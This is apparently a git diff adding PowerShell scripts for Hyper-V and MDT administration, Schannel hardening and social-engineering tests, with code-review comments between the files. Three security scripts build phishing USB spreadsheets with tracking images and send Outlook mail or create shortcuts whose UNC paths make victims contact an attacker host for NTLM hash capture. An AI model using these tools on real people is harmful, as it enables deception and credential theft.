diff --git a/Hyper-V/New-DifferencingVM.ps1 b/Hyper-V/New-DifferencingVM.ps1
new file mode 100644
index 0000000..9d7bf9a
--- /dev/null
+++ b/Hyper-V/New-DifferencingVM.ps1
@@ -0,0 +1,126 @@
+function New-DifferencingVM
+<#
+.SYNOPSIS
+
+ Function to create a Virtual machine based on a parent vhd - aka differencing disk.
+ NOTE - Default ParentVHD paths are hard-coded. These must be either changed manually or you need to specify -parentvhd
+
+ Author: Oddvar Moe
+ Required Dependencies: Hyper-v module
+
+.DESCRIPTION
+
+ Function to create a Virtual machine based on a parent vhd - aka differencing disk
+ NOTE - Default ParentVHD paths are hard-coded. These must be either changed manually or you need to specify -parentvhd
+
+.EXAMPLE
+ New-DifferencingVM -VMName Customer1 -VMLocation "D:\VirtualMachines" -VMNetwork EXT-Wireless -VMOS Windows10 -VMMemory 2048MB -VMDiskSize 60GB
+#>
+{
+ [CmdletBinding(DefaultParameterSetName="VMOS")]
+ [Alias()]
+ [OutputType([int])]
+ Param
+ (
+ [Parameter(Mandatory=$true,
+ ValueFromPipelineByPropertyName=$true)]
+ $VMName,
+
+ [Parameter(Mandatory=$true,ParameterSetName="VMOS")]
+ [ValidateSet("Windows10","Server2012R2")]
+ $VMOS,
+
+ [Parameter(Mandatory=$false)]
+ $VMLocation="D:\VirtualMachines",
+
+ [Parameter(Mandatory=$false,ParameterSetName="ParentVHDPath")]
+ $ParentVHD,
+
+ #A valid format is 2048MB, Default is 2048MB
+ [Parameter(Mandatory=$false)]
+ $VMMemory=2048MB,
+
+ #A valid format is 60GB
+ [Parameter(Mandatory=$false)]
+ $VMDiskSize=60GB,
+
+ #Option to select VM Generation
+ [Parameter(Mandatory=$false)]
+ [ValidateSet("1","2")]
+ $VMGeneration = "1"
+ )
+ DynamicParam
+ {
+ # Sets the dynamic parameters name
+ $ParameterName = 'VMNetwork'
+
+ # Create a dictionary
+ $RuntimeParameterDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary
+
+ # Create a collection of attributes
+ $AttributeCollection = New-Object System.Collections.ObjectModel.Collection[System.Attribute]
+
+ # Create and set the parameters' attributes
+ $ParameterAttribute = New-Object System.Management.Automation.ParameterAttribute
+ $ParameterAttribute.ValueFromPipeline = $true
+ $ParameterAttribute.ValueFromPipelineByPropertyName = $true
+ $ParameterAttribute.Mandatory = $true
+
+ # Add the attributes to the attributes collection
+ $AttributeCollection.Add($ParameterAttribute)
+
+ # Generate and set the ValidateSet
+ $arrSet = (Get-VMSwitch).Name
+ $ValidateSetAttribute = New-Object System.Management.Automation.ValidateSetAttribute($arrSet)
+
+ # Add the ValidateSet to the attributes collection
+ $AttributeCollection.Add($ValidateSetAttribute)
+
+ # Create and return the dynamic parameter
+ $RuntimeParameter = New-Object System.Management.Automation.RuntimeDefinedParameter($ParameterName, [string], $AttributeCollection)
+ $RuntimeParameterDictionary.Add($ParameterName, $RuntimeParameter)
+ return $RuntimeParameterDictionary
+ }
+
+ Begin
+ {
+ #To bind the dynamic parameter to a variable
+ $VMNetwork = $PsBoundParameters[$ParameterName]
+ }
+ Process
+ {
+ if ($PSCmdlet.ParameterSetName -eq "VMOS") {
+ if($VMOS -eq "Windows10")
+ {
+ $ParentVHD = "D:\HYPERV-MasterImages\Win10Ent1607x64MasterDisk\Win10Ent1607x64MasterDisk.vhdx"
+ }
+
+ if($VMOS -eq "Server2012R2")
+ {
+ $ParentVHD = "D:\HYPERV-MasterImages\Server2012R2\Server2012R2.vhdx"
+ }
+ }
+
+ try
+ {
+ New-VM -Name $VMName -MemoryStartupBytes $VMMemory -SwitchName $VMNetwork -Path $VMLocation -NoVHD -Generation $VMGeneration
+ New-VHD -ParentPath $ParentVHD -Differencing -Path "$VMLocation\$VMName\Virtual Hard Disks\$VMName-Disk1.vhdx" -SizeBytes $VMDiskSize
+ Add-VMHardDiskDrive -VMName $VMName -Path "$VMLocation\$VMName\Virtual Hard Disks\$VMName-Disk1.vhdx"
+
+ #Correct boot order on Gen2 VMs
+ if ($VMGeneration -eq "2") {
+ Set-VMFirmware $VMName -BootOrder (Get-VMHardDiskDrive $VMName),(Get-VMNetworkAdapter $VMName)
+ }
+ }
+ catch
+ {
+ return $_.Exception.Message
+ }
+ finally
+ {
+ }
+ }
+ End
+ {
+ }
+}
\ No newline at end of file
diff --git a/Hyper-V/Remove-VirtualMachine.ps1 b/Hyper-V/Remove-VirtualMachine.ps1
new file mode 100644
index 0000000..3b13710
--- /dev/null
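Review bot: The `catch` block in `Process` turns every failure into a returned string (`return $_.Exception.Message`), so a caller cannot tell a failed build from a successful one, and `[OutputType([int])]` matches nothing the function emits. `New-VM`, `New-VHD` and `Add-VMHardDiskDrive` are called without `-ErrorAction Stop`, so any non-terminating error (for example from `New-VHD` when `$ParentVHD` is empty, which the `ParentVHDPath` set allows because the parameter is not mandatory there) never reaches the `catch`, and the following calls still run against a half-built VM. I would add `-ErrorAction Stop` to those calls, replace the return with `throw`, and drop `[OutputType([int])]` and the empty `[Alias()]`.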
+++ b/Hyper-V/Remove-VirtualMachine.ps1 
@@ -0,0 +1,82 @@
+Function Remove-VirtualMachine
+<#
+.Synopsis
+ Function to remove Virtual machine and files. Gets VM names dynamically.
+ Author: Oddvar Moe
+ Required Dependencies: Hyper-v module
+.DESCRIPTION
+ Function to remove Virtual machine and files. Gets VM names dynamically.
+.EXAMPLE
+ PS C:\> Remove-VirtualMachine -VMName AAA -Verbose
+
+ Removes the virtual machine named AAA
+#>
+{
+ [CmdletBinding()]
+ Param()
+ DynamicParam
+ {
+ # Sets the dynamic parameters name
+ $ParameterName = 'VMName'
+
+ # Create a dictionary
+ $RuntimeParameterDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary
+
+ # Create a collection of attributes
+ $AttributeCollection = New-Object System.Collections.ObjectModel.Collection[System.Attribute]
+
+ # Create and set the parameters' attributes
+ $ParameterAttribute = New-Object System.Management.Automation.ParameterAttribute
+ $ParameterAttribute.ValueFromPipeline = $true
+ $ParameterAttribute.ValueFromPipelineByPropertyName = $true
+ $ParameterAttribute.Mandatory = $true
+
+ # Add the attributes to the attributes collection
+ $AttributeCollection.Add($ParameterAttribute)
+
+ # Generate and set the ValidateSet
+ $arrSet = (Get-Vm).Name
+ $ValidateSetAttribute = New-Object System.Management.Automation.ValidateSetAttribute($arrSet)
+
+ # Add the ValidateSet to the attributes collection
+ $AttributeCollection.Add($ValidateSetAttribute)
+
+ # Create and return the dynamic parameter
+ $RuntimeParameter = New-Object System.Management.Automation.RuntimeDefinedParameter($ParameterName, [string], $AttributeCollection)
+ $RuntimeParameterDictionary.Add($ParameterName, $RuntimeParameter)
+ return $RuntimeParameterDictionary
+ }
+
+ Begin
+ {
+ #To bind the dynamic parameter to a variable
+ $VMName = $PsBoundParameters[$ParameterName]
+ }
+ Process
+ {
+ try
+ {
+ $VM = Get-VM -Name $VMName
+ $disks = Get-VHD -VMId $vm.Id
+
+ Write-Verbose "Removing snapshots if any"
+ Remove-VMSnapshot -VMName $VMName –IncludeAllChildSnapshots
+ Write-Verbose "Removing virtual harddrive"
+ Remove-Item $disks.path -Force
+ Write-Verbose "Removing VM"
+ Remove-vm -Name $VMName -Force
+ Write-Verbose "Removing VM files and folders"
+ Remove-item -path $VM.path -Recurse -force
+ }
+ catch
+ {
+ return $_.Exception.Message
+ }
+ finally
+ {
+ }
+ }
+ End
+ {
+ }
+}
\ No newline at end of file
diff --git a/MDT/UpdateOSImage_1.1.ps1 b/MDT/UpdateOSImage_1.1.ps1
new file mode 100644
index 0000000..32e649a
--- /dev/null
+++ b/MDT/UpdateOSImage_1.1.ps1
@@ -0,0 +1,89 @@
+# Auto update OS Image
+# Author: Oddvar Moe - msitpros.com
+# Require: PowerCLI from Vmware
+# Require: You need to copy litetouchpe_x86 iso to the correct datastore on vmware
+# Require: Change $PSEmailServer and $EmailFrom in Sendmail function
+
+$Mailto = "your.account@customer.com"
+
+$isopath = "[VMware_Datastore.0] ISO\LiteTouchPE_x86.iso"
+$networkname = "Customer-network"
+$resourcepool = "HA Cluster"
+
+$MDTOSFolder = "E:\Deploymentshare\Operating Systems\Windows 10 X64 Enterprise - Deployment Image"
+$MDTBuilOSdFolder = "E:\BuildDeployment\Captures"
+
+
+# Function to ADD PowerCli as module
+function Import-PowerCLI {
+ Add-PSSnapin vmware*
+ if (Get-Item 'C:\Program Files (x86)' -ErrorAction SilentlyContinue) {
+ . "C:\Program Files (x86)\VMware\Infrastructure\vSphere PowerCLI\Scripts\Initialize-PowerCLIEnvironment.ps1"
+ }
+ else {
+ . "C:\Program Files\VMware\Infrastructure\vSphere PowerCLI\Scripts\Initialize-PowerCLIEnvironment.ps1"
+ }
+}
+
+function SendMail{
+param(
+[string]$emailto
+)
+
+[string]$PSEmailServer = "Exchange.customer.com"
+[string]$EmailFrom = "MDT "
+
+[string]$emailbody = @"
+
+
+
+
+
+Hi.
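Review bot: `Remove-item -path $VM.path -Recurse -force` deletes whatever directory the VM object reports, with no confirmation and no check that the directory belongs to this VM alone; for a VM registered in a shared configuration folder that could take other machines' files with it. The function is destructive but declares plain `[CmdletBinding()]`, so `-WhatIf` and `-Confirm` are unavailable; I would declare `[CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='High')]` and wrap the removals in `if ($PSCmdlet.ShouldProcess($VMName, 'Remove VM and delete its files'))`. The calls also lack `-ErrorAction Stop`, so a non-terminating failure in `Get-VM` or `Remove-VMSnapshot` does not stop the deletes that follow, and the `catch` hides any error as a returned string. The `–` before `IncludeAllChildSnapshots` is an en dash rather than an ASCII hyphen, which only parses when the file is read with the right encoding.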
+A new image has been created and has been added to the deployment solution. +
+

+Best regards +
+MDT Powershell script
+
+
+
+
+"@
+
+Send-MailMessage -To $emailto -Subject "MDT image was updated" -Body $emailbody -From $EmailFrom -Priority Normal -SmtpServer $PSEmailServer -encoding UTF8 -BodyAsHtml
+}
+
+#### SCRIPT STARTS HERE ####
+Import-PowerCLI
+
+#Remove all WIMs before starting
+get-childitem $MDTBuilOSdFolder | remove-item
+
+# Connect to virtual center and start VM
+Connect-VIServer -Server 192.168.100.10
+
+new-vm -name "AUTOMDTOSDBUILD" -DiskMB 60000 -MemoryMB 6000 -ResourcePool $resourcepool -Version v8 -numCpu 2 -GuestID "windows8_64Guest"
+get-vm -Name "AUTOMDTOSDBUILD" | get-networkadapter | Set-NetworkAdapter -NetworkName $networkname -type "E1000" -Confirm:$false
+$cd = New-CDDrive -VM "AUTOMDTOSDBUILD" -ISOPath $isopath
+Set-CDDrive -CD $cd -StartConnected $true -Confirm:$false
+Start-VM -VM "AUTOMDTOSDBUILD"
+
+$VM = get-vm -name "AUTOMDTOSDBUILD"
+
+while ((get-vm -name "AUTOMDTOSDBUILD").PowerState -eq "PoweredOn")
+{
+ write-host "Still deploying and alive - pausing script for 180 seconds - be patient" -ForegroundColor Green
+ sleep 180
+}
+
+#Remove the VM
+Remove-VM -VM "AUTOMDTOSDBUILD" -DeletePermanently -Confirm:$false
+
+#Check for WIM file and replace it
+$NewWim = Get-childItem $MDTBuilOSdFolder
+if($NewWim){move-item $NewWim.FullName $MDTOSFolder -force}
+
+#Send mail when done
+SendMail -emailto $Mailto
diff --git a/Security/Disable-Legacy-Protocols-and-Ciphers.1.0.ps1 b/Security/Disable-Legacy-Protocols-and-Ciphers.1.0.ps1
new file mode 100644
index 0000000..b669035
--- /dev/null
+++ b/Security/Disable-Legacy-Protocols-and-Ciphers.1.0.ps1
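Review bot: `SendMail -emailto $Mailto` runs unconditionally, so the "new image has been created" mail goes out even when `$NewWim` is empty because the build failed; the call belongs inside the `if($NewWim){...}` block. The `while` loop that waits for `AUTOMDTOSDBUILD` to power off has no upper bound, so a hung task sequence blocks the script indefinitely; a deadline with a failure path would fix that. The capture is then moved over the production deployment image with `-force` and no check of what it is (`Get-childItem $MDTBuilOSdFolder` may return several items or a non-WIM file), so I would filter on `*.wim`, require exactly one result, and keep the previous image until the new one has been verified.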
@@ -0,0 +1,74 @@
+<#
+ Author: Oddvar Moe [MVP]
+ Webpage: http://msitpros.com
+
+ Disables RC4 Windows servers
+ Requires Hotfix on olders server os (pre 2012R2)
+ https://support.microsoft.com/en-us/kb/2868725
+
+ Disables SSL3.0, SSL2.0 and TLS1.0
+ Both Client and Server side
+#>
+
+#Check if you are running elevated
+If (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`
+ [Security.Principal.WindowsBuiltInRole] "Administrator"))
+{
+ Write-Warning "You need to run this script from an elevated PowerShell prompt!`nPlease start the Script as an Administrator"
+ Break
+}
+
+#### Disable RC4 ####
+Write-host "Disabling RC4 Ciphers"
+$RC4CipherRootKey = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\"
+# $([char]0x2215) in order to have / in name
+$Keyname1 = "RC4 56$([char]0x2215)128"
+$Keyname2 = "RC4 40$([char]0x2215)128"
+$Keyname3 = "RC4 128$([char]0x2215)128"
+
+New-Item $RC4CipherRootKey$Keyname1 -Force
+New-Item $RC4CipherRootKey$Keyname2 -Force
+New-Item $RC4CipherRootKey$Keyname3 -Force
+
+
+Set-ItemProperty $RC4CipherRootKey$Keyname1 -Name Enabled -Value 0 -Type Dword
+Set-ItemProperty $RC4CipherRootKey$Keyname2 -Name Enabled -Value 0 -Type Dword
+Set-ItemProperty $RC4CipherRootKey$Keyname3 -Name Enabled -Value 0 -Type Dword
+#### End Disable RC4 ####
+
+
+#### Disable SSL3.0 ####
+write-host "Disabling SSL3.0 protocol"
+$SSL3MainKey = "HKLM:\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0"
+
+New-Item "$SSL3MainKey\Client\" -Force
+Set-ItemProperty "$SSL3MainKey\Client\" -Name "DisabledByDefault" -Value 1 -Type Dword
+
+New-Item "$SSL3MainKey\Server\" -Force
+Set-ItemProperty "$SSL3MainKey\Server\" -Name "Enabled" -Value 0 -Type Dword
+#### End Disable SSL3.0 ####
+
+
+#### Disable SSL2.0 ####
+write-host "Disabling SSL2.0 protocol"
+$SSL2MainKey = "HKLM:\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0"
+
+New-Item "$SSL2MainKey\Client\" -Force
+Set-ItemProperty "$SSL2MainKey\Client\" -Name "DisabledByDefault" -Value 1 -Type Dword
+
+New-Item "$SSL2MainKey\Server\" -Force
+Set-ItemProperty "$SSL2MainKey\Server\" -Name "Enabled" -Value 0 -Type Dword
+#### End Disable SSL2.0 ####
+
+
+#### Disable TLS1.0 ####
+write-host "Disabling TLS1.0 protocol"
+$TLS1MainKey = "HKLM:\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0"
+
+New-Item "$TLS1MainKey\Client\" -Force
+Set-ItemProperty "$TLS1MainKey\Client\" -Name "DisabledByDefault" -Value 1 -Type Dword
+
+New-Item "$TLS1MainKey\Server\" -Force
+Set-ItemProperty "$TLS1MainKey\Server\" -Name "Enabled" -Value 0 -Type Dword
+#### End Disable TLS1.0 ####
+Write-host "Done!"
diff --git a/Security/Generate-PhishingBait.1.0.ps1 b/Security/Generate-PhishingBait.1.0.ps1
new file mode 100644
index 0000000..0a63104
--- /dev/null
+++ b/Security/Generate-PhishingBait.1.0.ps1
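Review bot: The RC4 key names are built with `[char]0x2215` (DIVISION SLASH), which is a different character from the ASCII `/` in the names Schannel documents (`RC4 128/128` and so on), so as far as I can tell these three keys look right in regedit but are not the ones Schannel reads, and RC4 stays enabled. Creating the subkeys through the .NET registry API keeps the real `/`, as in the block below. Separately, the `Client` keys for SSL 2.0, SSL 3.0 and TLS 1.0 only get `DisabledByDefault = 1` and the `Server` keys only get `Enabled = 0`; setting both values under both subkeys is what fully disables a protocol, since `DisabledByDefault` alone still lets an application request it explicitly. `Break` outside a loop should be `exit 1`, and the final message should tell the operator that the protocol changes need a restart to take effect.

```powershell
# … unchanged: elevation check …
$ciphersPath = 'SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers'
foreach ($name in 'RC4 56/128', 'RC4 40/128', 'RC4 128/128') {
    # CreateSubKey treats only "\" as a separator, so the ASCII slash stays in the key name
    $key = [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("$ciphersPath\$name")
    $key.SetValue('Enabled', 0, [Microsoft.Win32.RegistryValueKind]::DWord)
    $key.Close()
}
# … unchanged: SSL 2.0 / SSL 3.0 / TLS 1.0 sections …
```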
@@ -0,0 +1,112 @@
+#Author: Oddvar Moe - msitpros.com
+#USB Stick production SE-test
+#Excel needs to be installed on machine running script
+#Creates an Excel Cheat with tracking mecanishm
+#Example in script uses New Company Organization
+
+# REMEMBER TO CHANGE $pictureURL and line 81 where to point click url.
+
+# Place to generate content
+$RootFolder = "C:\tempfolder"
+
+# Number to Generate
+$NumberOfMemsticks = 20
+
+# Filename to be placed on USB Stick
+$filename = "New Organization-Draft_1.0-withComments.xlsx"
+
+#Path to USB Stick
+$USBstickDrive = "E:\"
+
+# Excel Constants
+# MsoTriState
+Set-Variable msoFalse 0 -Option Constant -ErrorAction SilentlyContinue
+Set-Variable msoTrue 1 -Option Constant -ErrorAction SilentlyContinue
+
+function Pause
+{
+ #Used to pause the script to change USB stick between copy job
+ Read-Host 'Insert next USB stick and then press Enter to continue…' | Out-Null
+}
+
+
+#Loop variable
+$i = 1
+do
+{
+ #URL from where you load picture
+ $pictureURL = "http://msitpros.com/tracker$i.jpg"
+
+ write-host $pictureURL
+ $subfolder = "$RootFolder\$i"
+ mkdir $subfolder
+ cd $subfolder
+
+ #Code borrowed from Scripting Guy - Thanx
+ # cell width and height in points
+ Set-Variable cellWidth 10 -Option Constant -ErrorAction SilentlyContinue
+ Set-Variable cellHeight 10 -Option Constant -ErrorAction SilentlyContinue
+
+
+ $xl = New-Object -ComObject Excel.Application -Property @{
+ Visible = $true
+ DisplayAlerts = $false
+ }
+
+ $wb = $xl.WorkBooks.Add()
+ $sh = $wb.Sheets.Item(‘Sheet1’)
+
+ # arguments to insert the image through the Shapes.AddPicture Method
+ $LinkToFile = $msoTrue
+ $SaveWithDocument = $msoTrue
+
+ # Place picture at Column GS-ish to hide it
+ $Left = $cellWidth * 10000
+ $Top = $cellHeight * 1
+ $Width = $cellWidth * 10
+ $Height = $cellHeight * 10
+
+ # add the image to the Sheet
+ $img = $sh.Shapes.AddPicture($PictureURL, $LinkToFile, $SaveWithDocument, $Left, $Top, $Width, $Height)
+
+ # add trick text
+ #Number 1 is vertical
+ #Number 2 is horizontal
+ $sh.Cells.Item(1,1)="Content moved to Internal Sharepoint site"
+ $sh.Cells.Item(1,1).font.size = 18
+ $sh.Cells.Item(1,1).font.bold = $true
+
+ $range = $xl.Range("A2")
+ # Fake link to measure if the user clicks
+ $sh.Hyperlinks.Add($range,"http://8.8.8.8/$i/neworg.xls","","http://sharepoint.msitpros.com/organizationchart","LINK")
+ $sh.Cells.item(2,1).font.bold = $true
+ $sh.Cells.item(2,1).font.size = 22
+
+ #Increase size of document
+ $range2 = $sh.Range("A3","Z1000")
+ $range2.Font.Bold = $true
+
+ $file = "$subfolder\$filename"
+ $xl.ActiveWorkbook.SaveAs($file)
+
+ $wb.Close($false)
+ $xl.Quit()
+
+ $i++
+}
+until ($i -gt $NumberOfMemsticks)
+
+
+# Copy to USB stick and remove temporary file
+$ii = 1
+do
+{
+ $subfolder = "$RootFolder\$ii"
+ $file = "$subfolder\$filename"
+
+ Copy-Item $file $USBstickDrive
+ Remove-Item $subfolder -Force -Recurse
+ pause
+ $ii++
+}
+until ($ii -gt $NumberOfMemsticks)
diff --git a/Security/SMBCapture-Outlook.1.1.ps1 b/Security/SMBCapture-Outlook.1.1.ps1
new file mode 100644
index 0000000..b3602c5
--- /dev/null
+++ b/Security/SMBCapture-Outlook.1.1.ps1
@@ -0,0 +1,28 @@
+# Author: Oddvar Moe
+# https://msitpros.com
+# version: 1.1
+
+# Script uses Outlook so you need to have an active Outlook profile on the machine the script is running on.
+
+#If multiple recipients use ; as seperator"
+$Recipient = "john.doe@contoso.com"
+$AttackerIP = "192.168.0.100"
+
+$file1="\\$AttackerIP\PictureFolder\coolPicture.png"
+$Outlook = New-Object -comObject Outlook.Application
+$newmail = $Outlook.CreateItem(0)
+$newmail.Recipients.Add($Recipient) | Out-Null
+$newmail.Subject = "Funny Pictures"
+$newmail.HTMLBody = @"
+
+
+
+
+Hi. Check out this funny picture
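Review bot: The two URLs that receive the test traffic are literals buried in the loop (`$pictureURL = "http://msitpros.com/tracker$i.jpg"` and the `http://8.8.8.8/$i/neworg.xls` hyperlink target), and the header refers to the second one as "line 81", which stops being true as soon as the file is edited. Run unmodified, every opened workbook contacts hosts that are not part of the engagement, over plain HTTP. I would lift both into variables next to `$RootFolder` with no default value and stop when they are unset, e.g. `if (-not $TrackerBase) { throw 'Set $TrackerBase before running' }`.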
+
+
+
+"@
+
+$newmail.Send()
+#$Outlook.Quit()
\ No newline at end of file
diff --git a/Security/SMBCapture-ShortcutGenerator.1.1.ps1 b/Security/SMBCapture-ShortcutGenerator.1.1.ps1
new file mode 100644
index 0000000..d2be1c4
--- /dev/null
+++ b/Security/SMBCapture-ShortcutGenerator.1.1.ps1
@@ -0,0 +1,9 @@
+# Author: Oddvar Moe
+# https://msitpros.com
+# Version: 1.0
+$AttackerMachine = "192.168.0.100"
+$WshShell = New-Object -comObject WScript.Shell
+$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Regedit.lnk")
+$Shortcut.TargetPath = "C:\windows\regedit.exe"
+$Shortcut.Iconlocation = "\\$AttackerMachine\icons\icon.png,0"
+$Shortcut.Save()
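Review bot: Neither this script nor `SMBCapture-ShortcutGenerator.1.1.ps1` says what it exercises or how to tell whether the environment held up; the headers carry only author and version. I would add a comment block stating that the UNC reference built from `$AttackerIP` (here) and `$AttackerMachine` (in the shortcut script) makes the client attempt an SMB connection to that host, and that the test passes when the connection is blocked, which is what egress filtering of TCP 445 and a restriction on outgoing NTLM are meant to achieve. `$newmail.Send()` also dispatches immediately with no chance to check the recipient; `$newmail.Display()` would let the operator review the message first.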
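Review bot: The header says `# Version: 1.0` while the file is named `SMBCapture-ShortcutGenerator.1.1.ps1`; one of the two is stale. The script also writes `Regedit.lnk` to `$Home\Desktop` without checking for an existing file and leaves no record of what it created, so I would end with a line such as `Write-Host "Created $Home\Desktop\Regedit.lnk - remove after the test"` so the test artifact is cleaned up afterwards.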